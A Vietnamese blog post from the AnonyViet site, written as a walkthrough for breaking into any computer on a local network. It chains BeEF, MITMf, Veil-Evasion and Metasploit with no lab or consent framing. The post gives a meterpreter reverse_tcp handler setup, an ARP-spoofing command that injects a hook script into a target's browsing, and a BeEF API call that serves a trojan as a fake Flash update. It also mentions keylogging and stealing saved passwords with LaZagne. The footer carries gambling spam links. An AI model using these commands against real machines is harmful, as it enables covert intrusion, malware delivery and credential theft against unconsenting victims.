• Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit

AnonyViet by AnonyViet
10/12/2015 - Updated on 16/12/2020
in Kali Linux / Parrot
Reading Time: 5 mins read
A A
3

Ý tưởng: Beef + Mitmf + Veil Evasion + Metasploit.


Beef: Sử dụng để upload file chứa trojan mà Veil Evasion tạo ra đến máy tính nạn nhân qua trình duyệt web


Mitmf có nhiệm vụ tiêm hook.js đến một website bất kỳ khi nạn nhân mở bất kỳ một website nào mới.


Mitmf còn có thể tiêm một file trojan bất kỳ vào máy tính nạn nhân khi nạn nhân download một file .zip về máy mà không hề hay biêt file .zip đấy đã bị nhiễm trojan.

Mitmf còn có thể gi lại thao tác bàn phím trên máy tính nạn nhân khi truy cập trình duyệt web qua jskeylogger


Veil Evasion: tạo một trojan vượt qua tất cả các phần mềm diệt virus mà không bị phát hiện chạy ngầm trong máy tính của nạn nhân. tạo trojan với IP và PORT của máy tính hacker.


Metasploit. Luôn luông lắng nghe ở IP và PORT của hacker khi nạn nhân mở file có chứa trojan thì hacker sẽ đột nhập vào máy tính nạn nhân và toàn quyền kiểm soát. Bằng việc sử dụng các command trong Metasploit. Loạt bài sau tôi sẽ hướng dẫn các bạn sử dụng Metasploit Untimate. Để tăng tinh vui nhộn và đặc sắc thì có thể kết hợp thêm Lazagne để lấy thông tin user and password mà nạn nhân đã lưu trên trình duyệt web. ===> tự tuy duy thêm

Các bài viết liên quan

Cách sử dụng công cụ Metasploit để tấn công mạng cơ bản nhất 15

Cách sử dụng công cụ Metasploit để tấn công mạng cơ bản nhất

01/02/2022 - Updated on 05/02/2022
Hack Windows từ xa qua Internet với Metasploit 16

Hack Windows từ xa qua Internet với Metasploit

02/11/2021
cach dung dung metasploit pro

Cách Active Metasploit Pro để khai thác lỗ hổng bảo mật

03/07/2021
công cụ khai thác lỗ hỏng bảo mật

10 công cụ khai thác lỗ hỏng bảo mật các chuyên gia hay sử dụng

14/08/2020 - Updated on 16/12/2020


Chuần bị:

https://github.com/byt3bl33d3r/MITMf
https://github.com/Veil-Framework/Veil-Evasion

http://beefproject.com/

OS: Kali Linux.

Thực hiện:

1. Config Beef.

cd /usr/share/beef-xss/extensions/metasploit.

vi config.yaml

host: “192.168.1.12”

callback_host: “192.168.1.12”

{os: ‘custom’, path: ‘/usr/share/metasploit-framework/’}

cd /usr/share/beef-xss

vi config.yaml

metasploit:
enable: true


Chạy Beef ./beef

Vào trình duyệt gõ địa chỉ sau UI URL: http://192.168.1.12:3000/ui/panel user and pass default: beef and beef

Chạy Veil Evasion.

./Veil-Evasion.py


Chạy Metasploit.

msf > use multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit[*] Started reverse handler on 192.168.1.12:4444 [*] Starting the payload handler…

Chạy Mitmf.

mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.18 –inject –js-url http://192.168.1.12:3000/hook.js

Để tăng cuộc chơi thêm vui vẻ và thú vị hơn tôi đã tìm kiến trên internet một bài nhạc mang phong cách đặc trưng của hacker và sẽ phát trên máy tính nạn nhân thông qua Beef. khi tôi thực hiện điều này máy tính của nạn nhất sẽ tự động phát nhạc mà không có bất kì dấu hiệu nào.

copy bài nhạc vào đây.

/usr/share/beef-xss/extensions/demos/html

copy trojan tạo ra vào đây.

/usr/share/beef-xss/extensions/social_engineering/droppers

/usr/share/beef-xss/modules/exploits/local_host/firefox_extension_dropper/dropper

Ý tương tiếp theo tôi sẽ đầy trojan lên máy tính nạn nhân qua Beef bằng tính năng Fake Flash Updae trong Social Engineering.

Đề làm được việc này bạn cần chạy đoạn mã sau:

curl -H “Content-Type: application/json; charset=UTF-8” -d'{“mount”:”/flashplayer.exe”, “local_file”:”/extensions/social_engineering/droppers/flashplayer.exe”}’ -X POST 192.168.1.12.132/api/server/bind?token=4e0f77f2f2ef98f7fd3cd18aebbf96d75ef051c c

==> tôi không giải thích ở đây các bạn phải tự ngiên cứu thêm.

Mở nhạc hacker trên máy tính nạn nhân cho nạn nhân thư giãn tí Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit 13


Kết thúc chúng ta đột nhập thành công vào máy tính nạn nhân và còn mở nhạc cho nạn nhân nghe. còn rất nhiều kỹ thuật nữa trong bài này tôi không public vì tính chất nguy hiểm của nó. mọi người tự nghiên cứu và tư duy thêm Đột nhập vào một máy tính bất kỳ trong mạng LAN với Beef + Mitmf + Veil Evasion + Metasploit 14

(hackersutudent93 và nguồn từ Whitehat.vn)

Tags: BeefMetasploitMitmfVeil Evasion
Previous Post

Hướng dẫn sử dụng SQLMap

Next Post

Hiển thị mật khẩu trong Windows XP/7/8/10

AnonyViet

AnonyViet

Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

Tại sao Hacker thích dùng Kali Linux?
Kali Linux / Parrot

Tại sao Hacker thích dùng Kali Linux?

29/03/2022
Kali Linux 2021.4 tích hợp thêm 9 Tool mới và hỗ trợ Apple M1 17
Kali Linux / Parrot

Kali Linux 2021.4 tích hợp thêm 9 Tool mới và hỗ trợ Apple M1

12/12/2021
Giới thiệu về Discord
Kali Linux / Parrot

Hướng dẫn cài đặt Discord cho Linux

18/10/2021
Hướng dẫn cài Kali Linux WSL
Kali Linux / Parrot

Cách cài đặt Kali Linux trên Window 10 bằng WSL

27/08/2021
Cách cài đặt Parrot OS lên Laptop hoặc PC 18
Kali Linux / Parrot

Cách cài đặt Parrot OS lên Laptop hoặc PC

03/01/2021
parrot security os vmware
Kali Linux / Parrot

Hướng dẫn cài đặt Parrot Security OS trên VMWare

26/12/2020 - Updated on 27/12/2020
Next Post
Hiển thị mật khẩu trong Windows XP/7/8/10

Hiển thị mật khẩu trong Windows XP/7/8/10

guest
guest

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

3 Comments
oldest
newest
Inline Feedbacks
View all comments
Nguyễn Quang Tùng
Nguyễn Quang Tùng
5 years ago

làm video đi ad thế này khó hiểu quá

Reply
Lâm Trung Tính
Lâm Trung Tính
4 years ago

đúng rồi admin nên làm video hướng dẫn cụ thể đi, cho dễ hình dung

Reply
Cường
Cường
4 years ago

cái này cok video chưa vậy

Reply
wpdiscuz   wpDiscuz

Liên hệ Quảng Cáo

Lien he AnonyViet

Đối tác —

Fshare

Các bài mới

5 Website giúp bạn tìm chủ tài khoản Email là ai 19

5 Website giúp bạn tìm chủ tài khoản Email là ai

24/05/2022
godeal24

Giá bản quyền Windows 10 chỉ 5.71$, miễn phí nâng cấp lên Windows 11

23/05/2022
Cách thiết lập Shadowsocks với Outline để tạo Proxy cho riêng bạn 20

Cách thiết lập Shadowsocks với Outline để tạo Proxy cho riêng bạn

23/05/2022
coupon dmca

Cách bảo vệ bản quyền Website với DMCA – Coupon nâng cấp Pro giảm 50%

23/05/2022
hosting azdigi

Đánh giá gói Turbo Business Hosting của AZDIGI

22/05/2022

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

Bản quyền: DMCA.com Protection Status

Bài viết mới

  • 5 Website giúp bạn tìm chủ tài khoản Email là ai
  • Giá bản quyền Windows 10 chỉ 5.71$, miễn phí nâng cấp lên Windows 11
  • Cách thiết lập Shadowsocks với Outline để tạo Proxy cho riêng bạn
  • Cách bảo vệ bản quyền Website với DMCA – Coupon nâng cấp Pro giảm 50%
  • Đánh giá gói Turbo Business Hosting của AZDIGI
  • 5 vụ lừa đảo nguy hiểm nhất trên không gian mạng

©2022 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google iwin888 Bing tải game iwin Github tải iwin apk Github tải win456 Youtube ku fun wikipedia 88vin reddit twin 567LIVE MMLive SP666 92lottery sun86 stackoverflow

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2022 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google iwin888 Bing tải game iwin Github tải iwin apk Github tải win456 Youtube ku fun wikipedia 88vin reddit twin 567LIVE MMLive SP666 92lottery sun86 stackoverflow

wpDiscuz
pixel